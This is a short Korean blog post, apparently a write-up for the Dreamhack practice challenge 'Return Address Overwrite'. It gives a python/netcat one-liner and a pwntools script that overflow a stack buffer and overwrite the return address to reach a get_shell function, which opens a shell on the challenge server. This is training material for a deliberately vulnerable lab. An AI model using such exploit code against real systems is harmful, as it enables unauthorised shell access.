[dreamhack] Return Address Overwrite 풀이

Host: host1.dreamhack.games
Port: 10469/tcp

1. python 공격 코드 이용

(python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469

2. pwntools 이용

from pwn import *

p = remote('host1.dreamhack.games',10469) # 원격 서버 대상으로 익스플로잇 수행 
context.arch="amd64" # x86-64 

payload = 'A' * 0x30
payload += 'B' * 0x08
payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_shell address

p.recvuntil('Input: ')
p.sendline(payload)

p.interactive()

flag 얻는 방법

'Hacking > System Hacking' 카테고리의 다른 글

[dreamhack] basic_exploitation_001 문제풀이 (0)	2022.04.02
[dreamhack] basic_exploitation_000 문제풀이 (0)	2022.04.01
스택 버퍼 오버플로우 ( Stack buffer Overflow ) (0)	2022.03.31
Shellcode 란? (0)	2022.03.30
pwntools 사용법 (0)	2022.03.28

'Hacking > System Hacking' 카테고리의 다른 글

검색 태그

티스토리툴바